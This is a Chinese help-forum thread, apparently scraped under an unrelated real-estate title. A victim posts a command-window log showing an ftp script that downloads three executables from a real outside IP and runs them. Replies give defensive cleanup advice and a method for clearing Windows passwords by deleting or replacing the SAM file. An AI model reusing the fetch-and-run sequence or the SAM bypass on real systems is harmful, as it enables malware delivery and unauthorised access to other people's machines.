房地产商业招商:高手来看看是不是中病毒了?

来源:百度文库 编辑:高校问答 时间:2024/04/29 06:20:19
屏幕上出现cmd窗口,内容如下,管理员密码也被改了,系统进不去怎么办

C:\WINNT\system32>ftp.exe -s:x
ftp> open 61.138.10.55 21211
Connected to 61.138.10.55.
220-___--->>>[E-v-i-l_S-e-c-u-r-i-t-y_T-e-a-m]<<<---___
220-______________________________________________
220-???????????????????????
220-This Server is running since 1 days and 5:39 hours,
220-and has been accessed 771 times, 397 in the last 24 hours.
220-There are now 31 users logged in, Max allowed : Unlimited.
220-______________________________________________
220-???????????????????????
220-Free Disk Space : 1096.71 MB
220-Downloaded : 103404 Kb in 1390 Files
220-Uploaded : 178 Kb in 2 Files
220-Current Speed : 44.284 Kb/sec
220-Average Speed : 0.970 Kb/sec
220-______________________________________________
220 ???????????????????????
User (61.138.10.55:(none)):
331 User name okay, need password.

230 User logged in, proceed.
ftp>
ftp> bin
200 Type set to I.
ftp> get x.exe
200 PORT Command successful.
150 Opening BINARY mode data connection for x.exe (19976 Bytes).
226 Transfer complete.
ftp: 19976 bytes received in 8.11Seconds 2.46Kbytes/sec.
ftp> get y.exe
200 PORT Command successful.
150 Opening BINARY mode data connection for y.exe (30506 Bytes).
226 Transfer complete.
ftp: 30506 bytes received in 6.33Seconds 4.82Kbytes/sec.
ftp> get z.exe
200 PORT Command successful.
150 Opening BINARY mode data connection for z.exe (85394 Bytes).
226 Transfer complete.
ftp: 85394 bytes received in 51.56Seconds 1.66Kbytes/sec.
ftp> bye
221 Goodbye!

C:\WINNT\system32>del x

C:\WINNT\system32>START x.exe

C:\WINNT\system32>START y.exe

C:\WINNT\system32>START z.exe

C:\WINNT\system32>del x.bat

被人远程控制且登陆过了
那是你中了诸如“灰鸽子”一类的木马后没有及时清除导致的
我不知你的系统是什么,所以2000和Xp修改登陆密码的情况都给你讲讲吧
Win2000管理员密码丢失或更改后自己无法进入系统
1、下载NTFSDOS professional,找一台可运行的机器安装,然后运行NTFSDOS ProfessionalBoot Disk Wizard根据向导,插入两张软盘,要用到的是第一张。
2、用98启动盘启动到DOS下,然后插入刚才做的第一张软盘,Ntfspro.exe,它会自动分析当前硬盘分区表,如有NTFS分区信息,就会依次列出每个NTFS分区的盘符,如果出现报警可以不去管它。
3、在DOS状态下,进入Win2000所在的盘,进入System32\config目录,手工删除SAM文件,这样就把Win2000的所有用户的口令都清除了。
4、热启动机子回车就可以正常进入Win2000了。
5、如果确认机子使用的不是NTFS格式,而是FAT32,则可以直接用Win98启动机子到DOS下执行上面的第三步。

WinXp中忘记了系统管理员密码,删了SAM文件则会出现无法登陆,会出现“lsass.exe系统错误。安全账户管理器初始化失败……”确认后则会重启。可以用以下方法解决:在“故障恢复控制台”或命令行下,用Copy命令将“C:\windows\repair”下的SAM文件复制到
“C:\windows\sysytem32\config”下。重启即可。计算机会以初始安装的账户和密码登陆,但所作的配置会全部丢失,需要重新设置。

PS:登陆后恢复自己对系统的控制权后,第一个要做的事就是用杀毒软件、木马防杀软件和反间谍软件对自己的系统进行扫描,并最好全面扫描漏洞打上补丁。

楼主,61.138.10.55是个病毒网站,你举报吧!这些代码就是罪证!
建议把C:\WINNT\system32\ftp.exe改名,许多著名或不著名的病毒都靠它来下病毒和木马。

重新装个干净的系统

是的,我建议重新装系统